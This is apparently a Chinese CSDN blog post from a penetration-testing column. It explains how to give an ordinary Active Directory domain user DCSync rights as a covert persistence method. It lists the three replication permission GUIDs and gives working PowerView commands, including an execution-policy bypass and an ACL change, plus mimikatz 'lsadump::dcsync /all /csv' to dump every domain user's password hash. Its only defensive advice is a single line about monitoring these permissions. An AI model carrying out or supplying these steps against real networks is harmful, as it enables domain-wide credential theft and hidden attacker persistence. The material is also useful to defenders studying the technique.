赋予域内普通用户dcsync权限来变向权限维持

内网渗透 同时被 2 个专栏收录
51 篇文章 6 订阅
17 篇文章 1 订阅

前言

DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE:

DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-In-Filtered-Set,对应GUID为:89e95b76-444d-4c62-991a-0facbeda640c

利用过程

powerview

Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

使用mimikatz在低权限主机上读取域内其他用户的密码

privilege::Debug #可以不用这一句
lsadump::dcsync /all /csv

结果如下,在低权限的zhangsan主机上可以使用mimikatz读取域内所有用户的hash:
在这里插入图片描述

删除账号dcsync权限:

Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

防御方法

监控前面讲述的几个权限的分配情况。

  • 2
    点赞
  • 7
    评论
  • 2
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

相关推荐
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值